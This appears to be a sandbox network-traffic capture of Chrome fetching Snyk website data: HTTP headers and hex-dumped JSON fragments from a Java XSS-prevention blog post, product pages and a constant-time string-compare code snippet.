                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 37 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 73 65 6f 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 50 72 65 76 65 6e 74 69 6e 67 20 43 72 6f 73 73 2d 53 69 74 65 20 53 63 72 69 70 74 69 6e 67 20 28 58 53 53 29 20 69 6e 20 4a 61 76 61 20 61 70 70 6c 69 63 61 74 69 6f 6e 73 20 77 69 74 68 20 53 6e 79 6b 20 43 6f 64 65 5c 22 20 2d 20 53 45 4f 22 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000ment"}},"publishedVersion":7,"revision":1,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"seo"}},"locale":"en-US"},"fields":{"internalName":"\"Preventing Cross-Site Scripting (XSS) in Java applications with Snyk Code\" - SEO",
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC12INData Raw: 66 20 58 53 53 20 61 74 74 61 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: f XSS atta
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 63 6b 20 63 61 6e 20 62 65 20 70 61 72 74 69 63 75 6c 61 72 6c 79 20 64 61 6e 67 65 72 6f 75 73 20 62 65 63 61 75 73 65 20 69 74 20 63 61 6e 20 61 66 66 65 63 74 20 61 20 6c 61 72 67 65 20 6e 75 6d 62 65 72 20 6f 66 20 75 73 65 72 73 20 61 6e 64 20 6d 61 79 20 70 65 72 73 69 73 74 20 65 76 65 6e 20 61 66 74 65 72 20 74 68 65 20 69 6e 69 74 69 61 6c 20 69 6e 6a 65 63 74 69 6f 6e 20 68 61 73 20 62 65 65 6e 20 66 69 78 65 64 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 54 68 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000ck can be particularly dangerous because it can affect a large number of users and may persist even after the initial injection has been fixed.","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"marks":[],"value":"The
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC12INData Raw: 7d 7d 2c 22 6c 6f 63 61 6c 65 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: }},"locale
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC16384INData Raw: 30 30 30 31 37 46 33 43 0d 0a 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 66 75 6c 6c 4e 61 6d 65 22 3a 22 42 72 69 61 6e 20 56 65 72 6d 65 65 72 22 2c 22 73 6c 75 67 22 3a 22 62 72 69 61 6e 2d 76 65 72 6d 65 65 72 22 2c 22 66 69 72 73 74 4e 61 6d 65 22 3a 22 42 72 69 61 6e 22 2c 22 6c 61 73 74 4e 61 6d 65 22 3a 22 56 65 72 6d 65 65 72 22 2c 22 68 65 61 64 73 68 6f 74 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 36 37 38 32 38 37 30 36 35 2f 62 72 69 61 6e 2d 76 2e 6a 70 67 22 2c 22 74 61 67 73 22 3a 5b 5d 2c 22 74 79 70 65 22 3a 22 75 70 6c 6f 61 64 22 2c 22 62 79 74 65 73 22 3a 33 39 38 35 33 2c 22 77 69 64
                                                                                                                                                                                                                                                                                                              Data Ascii: 00017F3C":"en-US"},"fields":{"fullName":"Brian Vermeer","slug":"brian-vermeer","firstName":"Brian","lastName":"Vermeer","headshot":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1678287065/brian-v.jpg","tags":[],"type":"upload","bytes":39853,"wid
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC16384INData Raw: 73 20 61 6e 64 20 77 69 6e 20 63 6f 6f 6c 20 73 77 61 67 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 68 65 61 64 69 6e 67 2d 32 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 53 6e 79 6b e2 80 99 73 20 76 75 6c 6e 65 72 61 62 69 6c 69 74 79 20 66 69 78 2d 61 2d 74 68 6f 6e 2c 20 54 68 65 20 42 69 67 20 46 69 78 2c 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 72 75 6e 6e 69 6e 67 20 66 72 6f 6d 20 46 65 62 20 31 34 20 74 6f 20 4d 61 72 20 31 34 2e 20 4a 6f 69 6e 20 74 68 65 20 63 6f 6d 70 65 74 69 74 69 6f 6e 20 61 6e 64 20 66 69 78 20 76 75 6c 6e 65 72 61 62 69 6c 69 74 69 65 73 20
                                                                                                                                                                                                                                                                                                              Data Ascii: s and win cool swag","nodeType":"text"}],"nodeType":"heading-2"},{"data":{},"content":[{"data":{},"marks":[],"value":"Snyks vulnerability fix-a-thon, The Big Fix, is currently running from Feb 14 to Mar 14. Join the competition and fix vulnerabilities


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              58192.168.2.54978423.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC685OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/open-source-security-management.json?slug=product&slug=open-source-security-management HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"yk84ej87cw35xh"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/open-source-security-management.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::kmr4t-1729799346358-484384a2f6b4
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:06 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799346.1f60b66
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC15733INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 34 6c 4f 71 59 52 4e 5a 72 49 36 72 4d 49 4a 46 75 44 67 76 68 68 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 30 2d 32 30 54 30 30 3a 34 38 3a 35 36 2e 32 30 35 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 39 2d 32 32 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4lOqYRNZrI6rMIJFuDgvhh","type":"Entry","createdAt":"2022-10-20T00:48:56.205Z","updatedAt":"2023-09-22T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC15933INData Raw: 6e 74 2c 20 66 72 6f 6d 20 72 65 6d 65 64 69 61 74 69 6f 6e 20 74 6f 20 72 65 70 6f 72 74 69 6e 67 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 64 6f 63 75 6d 65 6e 74 22 7d 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 74 69 74 6c 65 54 65 78 74 22 3a 7b 7d 7d 7d 7d 2c 22 72 6f 77 73 22 3a 5b 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a
                                                                                                                                                                                                                                                                                                              Data Ascii: nt, from remediation to reporting.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"appearance":{"titleText":{}}}},"rows":[{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adz
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 68 74 22 3a 34 39 2c 22 76 65 72 73 69 6f 6e 22 3a 31 36 37 39 36 37 32 31 38 39 2c 22 64 75 72 61 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 6d 65 74 61 64 61 74 61 22 3a 5b 5d 2c 22 70 75 62 6c 69 63 5f 69 64 22 3a 22 77 65 62 73 69 74 65 2d 6c 6f 67 6f 2d 69 63 6f 6e 73 2f 6c 6f 67 6f 69 63 6f 6e 2d 6a 61 76 61 73 63 72 69 70 74 22 2c 22 63 72 65 61 74 65 64 5f 61 74 22 3a 22 32 30 32 33 2d 30 33 2d 32 34 54 31 35 3a 33 36 3a 32 39 5a 22 2c 22 73 65 63 75 72 65 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 36 37 39 36 37 32 31 38 39 2f 77 65 62 73 69 74 65 2d 6c 6f 67 6f 2d 69 63 6f 6e 73 2f 6c 6f 67 6f 69 63 6f 6e 2d 6a 61 76 61 73 63 72 69 70
                                                                                                                                                                                                                                                                                                              Data Ascii: ht":49,"version":1679672189,"duration":null,"metadata":[],"public_id":"website-logo-icons/logoicon-javascript","created_at":"2023-03-24T15:36:29Z","secure_url":"https://res.cloudinary.com/snyk/image/upload/v1679672189/website-logo-icons/logoicon-javascrip
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC1114INData Raw: 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 32 34 2c 22 72 65 76 69 73 69 6f 6e 22 3a 34 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 6d 6f 6c 65 63 75 6c 65 50 72 69 63 69 6e 67 43 61 72 64 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 54 65 61 6d 5c 22 20 2d 20 67 65 6e 65 72 69 63 20 70 72 6f 64 75 63 74 20 63 61 72 64 22 2c 22 68 65 61 64 6c 69 6e 65 22 3a 22 54 65 61 6d 22 2c 22 63 68 65
                                                                                                                                                                                                                                                                                                              Data Ascii: nk","linkType":"Environment"}},"publishedVersion":24,"revision":4,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"moleculePricingCard"}},"locale":"en-US"},"fields":{"internalName":"\"Team\" - generic product card","headline":"Team","che
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 69 6f 6e 22 3a 34 32 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 63 6f 6e 74 65 6e 74 54 65 78 74 53 69 6e 67 6c 65 4c 69 6e 65 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 74 65 78 74 22 3a 22 4a 69 72 61 20 69 6e 74 65 67 72 61 74 69 6f 6e 22 7d 7d 5d 2c 22 61 63 74 69 6f 6e 73 22 3a 5b 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000ion":42,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"contentTextSingleLine"}},"locale":"en-US"},"fields":{"text":"Jira integration"}}],"actions":[{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","l
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC12INData Raw: 76 61 6c 75 65 22 3a 22 30 78 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: value":"0x
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 52 69 63 6b 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 68 79 70 65 72 6c 69 6e 6b 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 69 74 61 6c 69 63 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 2c 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 69 74 61 6c 69 63 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 61 73 20 73 65 65 6e 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000Rick","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[{"type":"italic"}],"value":",","nodeType":"text"},{"data":{},"marks":[],"value":" ","nodeType":"text"},{"data":{},"marks":[{"type":"italic"}],"value":"as seen ","nodeType":"te
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC12INData Raw: 20 55 3b 20 69 20 3c 20 6c 65 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: U; i < le
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC16384INData Raw: 30 30 30 31 30 31 38 37 0d 0a 6e 3b 20 69 2b 2b 29 5c 6e 20 20 20 7b 5c 6e 20 20 20 20 20 64 20 7c 3d 20 62 31 5b 69 5d 20 5e 20 62 32 5b 69 5d 3b 5c 6e 20 20 20 7d 5c 6e 20 20 20 72 65 74 75 72 6e 20 28 69 6e 74 29 28 28 31 20 26 28 28 64 20 2d 20 31 29 20 3e 3e 20 38 29 29 20 2d 20 31 29 3b 5c 6e 7d 5c 6e 5c 6e 69 6e 74 20 70 75 72 65 5f 73 74 72 63 6d 70 28 63 6f 6e 73 74 20 63 68 61 72 20 2a 63 6f 6e 73 74 20 73 31 2c 20 63 6f 6e 73 74 20 63 68 61 72 20 2a 63 6f 6e 73 74 20 73 32 29 5c 6e 7b 5c 6e 20 20 72 65 74 75 72 6e 20 70 75 72 65 5f 6d 65 6d 63 6d 70 28 73 31 2c 20 73 32 2c 20 73 74 72 6c 65 6e 28 73 31 29 20 2b 20 31 20 55 29 3b 5c 6e 7d 22 7d 7d 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 65 6d 62 65 64 64
                                                                                                                                                                                                                                                                                                              Data Ascii: 00010187n; i++)\n {\n d |= b1[i] ^ b2[i];\n }\n return (int)((1 &((d - 1) >> 8)) - 1);\n}\n\nint pure_strcmp(const char *const s1, const char *const s2)\n{\n return pure_memcmp(s1, s2, strlen(s1) + 1 U);\n}"}}},"content":[],"nodeType":"embedd
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC16384INData Raw: 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 42 69 69 61 69 6a 54 59 51 31 34 52 61 7a 66 46 67 38 55 4d 63 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 38 54 31 35 3a 35 38 3a 32 34 2e 32 34 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 35 2d 33 30 54 30 34 3a 31 35 3a 32 31 2e 38 31 36 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: :[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"BiiaijTYQ14RazfFg8UMc","type":"Entry","createdAt":"2022-11-08T15:58:24.247Z","updatedAt":"2024-05-30T04:15:21.816Z","environment":{"sys":{"id":"master","type":"Link",


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              59192.168.2.54978223.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC691OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/container-vulnerability-management.json?slug=product&slug=container-vulnerability-management HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC656INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"e92mxz31z51vhl"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/container-vulnerability-management.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::jnk4v-1729799346418-8e896c45833a
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:06 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799346.1f60b77
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC15728INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 36 4f 65 6f 6e 50 49 78 46 30 65 4a 4a 45 71 58 65 62 37 65 34 6c 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 30 2d 32 30 54 31 35 3a 33 39 3a 31 30 2e 30 39 39 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 35 2d 30 31 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6OeonPIxF0eJJEqXeb7e4l","type":"Entry","createdAt":"2022-10-20T15:39:10.099Z","updatedAt":"2024-05-01T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC15927INData Raw: 65 22 3a 22 52 65 6d 65 64 69 61 74 69 6f 6e 20 67 75 69 64 61 6e 63 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 53 6e 79 6b 20 43 6f 6e 74 61 69 6e 65 72 20 6c 65 74 73 20 64 65 76 65 6c 6f 70 65 72 73 20 6b 6e 6f 77 20 74 68 65 20 72 69 73 6b 73 20 69 6e 20 65 61 63 68 20 69 6d 61 67 65 2c 20 61 6e 64 20 70 72 6f 76 69 64 65 73 20 6f 6e 65 2d 63 6c 69 63 6b 20 75 70 67 72 61 64 65 73 20 61 6e 64 20 61 6c 74 65 72 6e 61 74 69 76 65 20 69 6d 61 67 65 20 72 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 73 2e 22 2c 22 6e 6f 64 65 54 79
                                                                                                                                                                                                                                                                                                              Data Ascii: e":"Remediation guidance","description":{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[],"value":"Snyk Container lets developers know the risks in each image, and provides one-click upgrades and alternative image recommendations.","nodeTy
